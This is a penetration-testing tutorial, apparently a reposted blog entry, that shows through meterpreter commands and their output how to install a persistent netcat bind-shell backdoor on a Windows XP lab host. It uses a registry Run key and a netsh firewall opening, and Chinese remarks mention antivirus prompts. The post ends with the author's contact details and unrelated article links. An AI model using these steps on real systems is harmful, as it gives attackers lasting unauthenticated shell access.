In this example, instead of looking up information on the remote system, we will be installing a netcat backdoor. This includes changes to the system registry and firewall.

First, we must upload a copy of netcat to the remote system.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe C:\\windows\\system32

[*] uploading  : /tmp/nc.exe -> C:\windows\system32

[*] uploaded   : /tmp/nc.exe -> C:\windows\system32nc.exe

  Afterwards, we work with the registry to have netcat execute on start up and listen on port 445. We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’.

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

Enumerating: HKLM\software\microsoft\windows\currentversion\run

  Values ():

    VMware Tools

    VMware User Process

    quicktftpserver

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe'

Successful set nc.

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc

Key: HKLM\software\microsoft\windows\currentversion\Run

Name: nc

Type: REG_SZ

Data: C:\windows\system32\nc.exe -Ldp  -e cmd.exe

  使用命令行自带的reg命令也行, 前提是系统杀毒软件不出提示:

REG ADD HKLM\software\microsoft\windows\currentversion\run /v nc /t REG_SZ /d "c:\xxx.exe"

  Next, we need to alter the system to allow remote connections through the firewall to our netcat backdoor. We open up an interactive command prompt and use the ‘netsh’ command to make the changes as it is far less error prone than altering the registry directly. Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent.

meterpreter > execute -f cmd -i

Process  created.

Channel  created.

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim\My Documents > netsh firewall show opmode

Netsh firewall show opmode

Domain profile configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Standard profile configuration (current):

-------------------------------------------------------------------

Operational mode                  = Enable

Exception mode                    = Enable

Local Area Connection firewall configuration:

-------------------------------------------------------------------

Operational mode                  = Enable

  We open up port 445 in the firewall and double-check that it was set properly.

C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

netsh firewall add portopening TCP  "Service Firewall" ENABLE ALL

Ok.

C:\Documents and Settings\Jim\My Documents > netsh firewall show portopening

netsh firewall show portopening

Port configuration for Domain profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:

Port   Protocol  Mode     Name

-------------------------------------------------------------------

    TCP       Enable   Service Firewall

    TCP       Enable   NetBIOS Session Service

    TCP       Enable   SMB over TCP

    UDP       Enable   NetBIOS Name Service

    UDP       Enable   NetBIOS Datagram Service

C:\Documents and Settings\Jim\My Documents >

  So with that being completed, we will reboot the remote system and test out the netcat shell.

root@kali:~# nc -v 172.16.104.128

172.16.104.128: inverse host lookup failed: Unknown server error : Connection timed out

(UNKNOWN) [172.16.104.128]  (?) open

Microsoft Windows XP [Version 5.1.]

(C) Copyright - Microsoft Corp.

C:\Documents and Settings\Jim > dir

dir

Volume in drive C has no label.

Volume Serial Number is E423-E726

Directory of C:\Documents and Settings\Jim

// : AM

.

// : AM

..

// : AM  ;i

// : PM

Desktop

// : PM

Favorites

// : PM

My Documents

// : AM  QCY

// : AM

Start Menu

// : AM  talltelnet.log

// : AM  talltftp.log

 File(s)  bytes

 Dir(s) ,,, bytes free

C:\Documents and Settings\Jim >

  Wonderful! In a real world situation, we would not be using such a simple backdoor as this, with no authentication or encryption, however the principles of this process remain the same for other changes to the system, and other sorts of programs one might want to execute on start up.

  .使用sc创建自定义服务,留下后门, 但是有个问题是360还是会提示, 防止注册表被写入

作者: NONO
出处:http://www.cnblogs.com/diligenceday/

企业网站:http://www.idrwl.com/
开源博客:http://sqqihao.github.io/
QQ:287101329

微信:18101055830

Persistent Netcat Backdoor的更多相关文章

  1. Microsoft Windows .Reg File Dialog Box Message Spoofing 0day

    Microsoft Windows .Reg文件对话框消息欺骗 0day 概述 扩展名为.reg的文件是Windows注册表中使用的注册文件.这些文件可以包含hives.密钥和值..reg文件可以在文 ...

  2. Persistent Data Structures

    原文链接:http://www.codeproject.com/Articles/9680/Persistent-Data-Structures Introduction When you hear ...

  3. CodeForces #368 div2 D Persistent Bookcase DFS

    题目链接:D Persistent Bookcase 题意:有一个n*m的书架,开始是空的,现在有k种操作: 1 x y 这个位置如果没书,放书. 2 x y 这个位置如果有书,拿走. 3 x 反转这 ...

  4. coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores.

    最近在修改一个程序BUG的时候遇到一个问题coreData部分报错:This NSPersistentStoreCoordinator has no persistent stores. 但实际跑程序 ...

  5. Exception loading sessions from persistent storage

    严重: Exception loading sessions from persistent storage java.io.EOFException 删除Tomcat里面的work/Catalina ...

  6. 【Codeforces-707D】Persistent Bookcase DFS + 线段树

    D. Persistent Bookcase Recently in school Alina has learned what are the persistent data structures: ...

  7. netcat命令

    1 简介 netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据.通过与其他工具结合和重定向,你可以在脚本中以多种方式使用它.使用netcat命令所能完成的事情令人惊讶. netc ...

  8. nc 局域网聊天+文件传输(netcat)

    nc 局域网聊天+文件传输 nc的全程是netcat,这个工具非常好用. 有时候我们需要在局域网内传送一些文本消息或者文件的时候,通常的做法是安装一些局域网通讯软件,然后来做.其实不必要这样,使用nc ...

  9. POJ - 3652 Persistent Bits

    “模拟”类型,题型容易,使用bitset库对二进制逐位操作,初始化.十进制转二进制(unsigned int).位操作. POJ - 3652 Persistent Bits Time Limit:  ...

随机推荐

  1. spring集成jpa【为什么有 persistant.xml 文件呢?】

    原文地址: http://www.cnblogs.com/javahuang/archive/2012/12/19/2824633.html spring集成JPA的其中一种方式 JPA和hibern ...

  2. Windows/Linux下引用jar包,并用javac/java编译运行

    Windows/Linux下引用jar包,并用javac/java编译运行,有需要的朋友可以参考下. 1> Windows 假设要引用的jar放在D:/test目录下,名字为t1.jar, ja ...

  3. 在Android.mk文件中输出打印消息

    http://www.xuebuyuan.com/1947880.html 在进行Android NDK的开发当中有时想看看Android.mk文件当中某个变量的值,可以再Android.mk文件当中 ...

  4. JS --- 三目运算符

    1.什么是三目运算:(布尔表达式 ? 值0:值1;) 5>3?alert('5大'):alert('3大'); 即    if(5>3){alert('5大')}else{alert('3 ...

  5. 黑马day17 ajax&实现username自己主动刷新

    1. regist.jsp文件 <%@ page language="java" pageEncoding="utf-8"%> <!DOCTY ...

  6. html效果增强

    1:提示框 http://keleyi.com/keleyi/phtml/jqplug/ 2:loading效果 <script>function showPage(){    $('#d ...

  7. CSS3 Flex布局整理(一)

    一.说明 1.在以往的布局方案中,都是基于盒装模型,依赖display属性+position属性+float属性等. 他对于那些特殊布局非常不方便,比如,垂直居中等. 并且不同浏览器的盒模型还有些差异 ...

  8. 从阿里Java开发手册学习线程池的正确创建方法

    前言 最近看阿里的 Java开发手册,上面有线程池的一个建议: [强制]线程池不允许使用 Executors 去创建,而是通过 ThreadPoolExecutor 的方式,这样的处理方式让写的同学更 ...

  9. Caffe SSD AttributeError: 'module' object has no attribute 'LabelMap'

    caffe ssd 错误描述: AttributeError: 'module' object has no attribute 'LabelMap' SSD from caffe.proto imp ...

  10. [转]缓慢但胜在稳健,HBase大势已成

    CSDN Hbase : http://www.csdn.net/tag/hbase 在NoSQL数据库领域,统治产品无疑当属MongDB和DataStax Enterprise(一个领先的Apach ...